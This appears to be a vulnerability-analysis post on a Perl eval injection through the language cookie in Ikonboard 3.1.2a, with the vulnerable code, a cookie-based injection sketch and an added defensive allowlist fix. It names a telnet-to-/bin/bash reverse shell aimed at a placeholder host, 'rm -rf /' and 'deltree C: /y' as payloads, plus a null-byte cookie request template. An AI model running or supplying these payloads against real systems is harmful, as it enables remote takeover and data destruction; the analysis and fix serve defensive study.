Attempts with Ikonboard 3.1.2a
Vendor: Jarvis Entertainment
Product: Ikonboard
Version: 3.1.2a and Below (All current versions).
On the topic of the recent post about Ikonboard and its command execution
vulnerabilities:
In FUNC.pm:
# Make sure the cookie data is legal
if ($iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}) {
$iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'} =~
s/^([\d\w]+)$/$1/;
}
$default = $iB::COOKIES->{$iB::INFO->{'COOKIE_ID'}.'lang'}
|| $iB::INFO->{'DEFAULT_LANGUAGE'}
|| 'en';
# Quick check to make sure the directory exists
unless (-d $iB::INFO->{IKON_DIR}."Languages/$default") {
$default = 'en';
}
my $code = 'require '. "\"$default/" .$area. '.pm"; $lang ='. $area.
'->new();';
eval $code;
$obj->cgi_error("Could not access the language file: $@") if $@;
return $lang;
}
--------------
The first bit is of course where the exploit actually occurs. Although we can
definitely define $default to our own value, I scratched my head for a while
trying to figure out how this could be exploited.
After a few hours of staring I came to the final (and easy) conclusion that is
this:
If $default were to equal the following (where 'en' is the usual default string
contained in $default, UniversalWords is contained in $area, and then the .pm etc.):
$default = "en/UniversalWords.pm\"; <My code> ; ##"
then the eval would simply interpret to the following:
eval require "en/UniversalWords.pm"; <My Code>; ##/" .$area. '.pm"; $lang = '.
$area. '->new().
So what would happen is the eval would do the require on en/UniversalWords.pm,
then it would move on to execute whatever arbitrary Perl code you placed in <My
Code>, such as a
" `telnet bla.bla.bla.bla | /bin/bash | telnet bla.bla.bla.bla` " or worse
(hopefully) a deltree C: /y or rm -rf /, seeing as Ikonboard can be run on
Linux or Windows.
The method of injecting the code we wish into $default would be as simple as
it is in the exploit for 3.1.1:
GET $PATH HTTP/1.1
Host: $HOST
Cookie: lang=%HEX$HEX%HEX%00 ## Followed by a Null Byte to bypass filters.
Connection: close
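As an added illustration (not Ikonboard's code and not part of the original post), the Perl script below contrasts the FUNC.pm check quoted above, a substitution that leaves any non-matching cookie value untouched, with an allowlist check that actually rejects it, and shows a loader that builds no Perl source from the cookie at all, so there is nothing for a quote, semicolon or trailing null byte to break out of. The function names, the throwaway Languages tree and the sample cookie values are constructed for this demonstration.

```perl
#!/usr/bin/perl
# Added example, not Ikonboard's code. Function names and the sample cookie
# values below are constructed for this illustration.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# Mirrors the check in FUNC.pm. s/^([\d\w]+)$/$1/ replaces a matching value
# with itself and does nothing to a non-matching one, so it never rejects
# anything: '/', '"', ';' and NUL bytes all pass straight through.
sub check_lang_original {
    my ($lang) = @_;
    $lang =~ s/^([\d\w]+)$/$1/ if defined $lang;
    return $lang || 'en';
}

# Allowlist check: the value must be a single word-character token from start
# to end (\A..\z, so a trailing newline or NUL does not slip past $); anything
# else falls back to the default language.
sub check_lang_fixed {
    my ($lang) = @_;
    return 'en' unless defined $lang && $lang =~ /\A\w+\z/;
    return $lang;
}

# Loader with no string eval: the language name is validated, the directory is
# checked, and the module is loaded by file path. $area is a package name that
# comes from the application, never from the request.
sub load_language {
    my ($cookie_lang, $area, $base_dir) = @_;
    my $default = check_lang_fixed($cookie_lang);
    $default = 'en' unless -d "$base_dir/Languages/$default";
    require "$base_dir/Languages/$default/$area.pm";
    return $area->new();
}

# Render control characters so a NUL byte is visible in the output.
sub show {
    my ($s) = @_;
    (my $out = $s) =~ s/([^\x20-\x7e])/sprintf('\\x%02x', ord $1)/ge;
    return $out;
}

# Constructed cookie values: two legitimate, two that the original check lets
# through unchanged (a path separator plus a quote, and a trailing NUL byte).
my @samples = ('en', 'de', 'en/other"; #', "en\0");

for my $v (@samples) {
    printf "%-16s original -> %-16s fixed -> %s\n",
        show($v), show(check_lang_original($v)), show(check_lang_fixed($v));
}

# A throwaway Languages tree so load_language can run to completion here.
my $tmp = tempdir(CLEANUP => 1);
make_path("$tmp/Languages/en");
open my $fh, '>', "$tmp/Languages/en/UniversalWords.pm" or die "open: $!";
print $fh "package UniversalWords;\nsub new { bless +{ lang => 'en' }, shift }\n1;\n";
close $fh;

# The hostile value is discarded by the allowlist and 'en' is loaded instead.
my $obj = load_language('en/other"; #', 'UniversalWords', $tmp);
printf "loaded %s (%s)\n", ref $obj, $obj->{lang};
```

Run it as an ordinary Perl script. The first two sample values come out of both checks unchanged, while the last two come out of check_lang_original exactly as they went in and out of check_lang_fixed as 'en'. The design point is that input validation by substitution only proves that a value is unchanged when it matches; a check that is meant to reject must branch on the match result, and the data should then be used as a path or a lookup key rather than concatenated into source handed to eval.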
-------
As of this moment I have not written a working exploit and am not even 100%
sure if this would work; seeing as the person who posted this vulnerability a
day ago claimed he had a working example, I decided to wait on this to see how
it is done.
--K-sPecial